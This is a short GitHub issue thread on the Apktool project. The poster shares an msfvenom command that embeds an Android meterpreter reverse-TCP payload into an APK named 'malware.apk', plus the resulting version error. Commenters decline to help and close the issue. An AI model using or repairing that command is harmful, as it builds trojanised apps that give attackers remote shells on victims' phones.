### ISSUE TITLE
not able to build with apktool

### ISSUE THREAD

**Issue by mikhaelalsayyed** [iBotPeaches/Apktool#2252]
i am using the apktool version 2.4.0 and this is what is happening
msfvenom -x /root/Downloads/test.apk -p android/meterpreter/reverse_tcp LHOST=xxxxxxxxxx LPORT= -o /root/Desktop/malware.apk
Using APK template: /root/Downloads/touch.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.4.0
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

**Comment by Ticklefish** [comment]
Two things:

1. This isn't an apktool error, this is generated by another program.
2. You seem to be trying to create an APK with malware in it. I doubt you'll get much help with doing that here.

**Comment by iBotPeaches** [comment]
Yeah not sure what venom's problem is, 2.4.0 is a valid release. As said above, not really an Apktool issue.

Closing.
